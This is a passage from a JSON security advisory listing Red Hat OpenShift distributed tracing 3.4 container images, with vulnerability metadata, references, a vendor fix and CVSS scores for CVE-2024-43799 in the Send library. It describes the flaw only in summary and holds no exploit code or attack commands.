3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "express: Improper Input Handling in Express Redirects" }, { "cve": "CVE-2024-43799", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-10T15:30:30.869487+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2311153" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", "title": "Vulnerability description" }, { "category": "summary", "text": "send: Code Execution Vulnerability in Send Library", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-43799" }, { "category": "external", "summary": "RHBZ#2311153", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799", "url": "https://www.cve.org/CVERecord?id=CVE-2024-43799" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799" }, { "category": "external", "summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", "url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35" }, { "category": "external", "summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", "url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg" } ], "release_date": "2024-09-10T15:15:17.727000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 